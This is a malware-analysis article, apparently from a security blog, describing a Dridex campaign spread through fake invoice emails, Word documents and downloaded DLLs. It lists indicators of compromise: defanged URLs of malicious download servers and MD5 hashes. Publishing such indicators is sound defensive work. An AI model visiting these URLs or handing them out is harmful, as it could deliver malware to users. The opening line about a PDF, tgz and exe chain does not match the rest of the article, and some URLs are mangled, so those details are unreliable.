The fake pdf attached to the "PURCHASE ORDER 05-30-2023" email contains a link, from which you download a tgz file with a TAR, inside which there is an exe: the malware.
Cybercrime, new Dridex global campaign via false invoices
Technical analysis by the malware Hunter JAMESWT
New global Dridex campaign with the lure of false invoices. The email contains a link that downloads a Word file, which then downloads a DLL and infects the machine with malware. The attachment, however, uses the same template as Emotet
Dridex is hiding behind a new cybercrime malspam campaign, which uses false invoices to convey the banking trojan in many countries. The text, written in English, refers to a payment with a link. This then leads the download of a Word document on the victim’s computer, which contacts some malicious links and downloads a DLL. This starts the malware infection chain. Furthermore, each email contains a different link. If, however, it is detected that the Doc has already been downloaded previously, the user is redirected to another site (https: //www.solvay [.com / en /). Moreover, the attachment uses the same template as the Emotet Doc.
The email text
The Word attachment from which the DLL that infects the computer with malware is downloaded
Emotet template variant
The urls contacted by the DOC to download the Dridex DLL
The PowerShell launched by the Doc with the urls inside
The IOCs
Some Doc Urls
https://awak[.business/app.php
https://thuexe[danangkhatran[.com/app.php
https://sale[s.balancedearnings[.com/app.php
https://immobilier-en-perigord.]com/app.php
https://immobilier-en-perigord.]com/msayqpkvkyq.php
https://immobilier-en-perigord.]com/yymclv.php
https://immobilier-en-perigord.]com/zpsxxla.php
https://immobilier-en-perigord.]com/zxlbw.php
https://tugrulgulenc[.com[.tr/app.php
https://tugrulgulenc[.com[.tr/msayqpkvkyq.php
https://tugrulgulenc[.com[.tr/yymclv.php
https://tugrulgulenc[.com[.tr/zpsxxla.php
https://tugrulgulenc[.com[.tr/zxlbw.php
http://dnztasimacilik.[com[.tr/app.php
https://invoice.kirtiagarwal.[com/app.php
https://thecrossfithandbook[.com/app.php
https://thecrossfithandbook[.com/msayqpkvkyq.php
https://thecrossfithandbook[.com/yymclv.php
https://thecrossfithandbook[.com/zpsxxla.php
https://thecrossfithandbook[.com/zxlbw.php
https://wc[.albatronic[.es/app.php
https://wc[.albatronic[.es/msayqpkvkyq.php
https://wc[.albatronic[.es/yymclv.php
https://wc[.albatronic[.es/zpsxxla.phph
ttps://wc[.albatronic[.es/zxlbw.php
https://mail.misbahelmudii[.org/app.php
https://rehaozelegitim.]com/app.php
https://dnztasimacilik.]http://com.tr/app.php
https://biais.[com[.tr/app.php
https://sintecor[.cl/app.php
https://sergioluizehenrique.]com].br/app.php
https://jigsaw.[watch/zpsxxla.php
https://jigsaw.[watch/yymclv.php
https://jigsaw.[watch/msayqpkvkyq.php
https://jigsaw.[watch/mmvvbg.php
https://jigsaw.[watch/ijuljytf.php
https://jigsaw.[watch/app.php
Dll Urls
https://kazanagroceryandgifts[.com/l1vjebjq.rar
https://latest.[sowilo[.co[.za/swgcregeb.rar
https://aksmusicgroup[.com/tfh7f4zs.zip
https://fit-city.[online/z5d13zg.pdf
https://pumppazh.[com/px9cb1l.rar
https://murfreesboro.fairwayconcierge[.com/fjo6g5.txt
https://ryner[.net[.au/sqtsw5a.zip
https://sunnysidecafemi[.com/nqixvjc.pdf
https://visum360[.[com[.uy/g40jyw5.pdf
https://yungen[.kevinmccollow[.com/s981qtmu.pdf
Doc MD5
d19e2afc2c054ed51820f6ae8fb709d0
53849a2094f6ef43044afcef9e5cc970
1238cd6ae1c7814f89efb17add7a72d8
ada9082db16c39fa55860f17a020b02d
6fd1a1225481a579181dc7eb780a0edb
3788be0bec0902a9d650b7a7f40666da
d3971995090a5318942991dcc0e15afc
42d869db0856246c8cabdd94499504f6
263848d8c60b4e7704a11453bd9c5c0b
f35608c60a8027a790ab9511c9913ff8
d79e4233b2995c62dced23da7512b0d8
c4f5d61353c305c328156fc911ccbd8b
b0e9f9a6fdf7e3b656b100b784788d64
Payload MD5
fb4d330648556b4e4b6ae9daf2b7506e
3b686bf0afdd4bf9dc6f956a28444eab
Ps1 MD5
37ea083c5ed179440295c26791060792
b9c2d005d2619f1122f5032b84a1d2bf
Related Posts
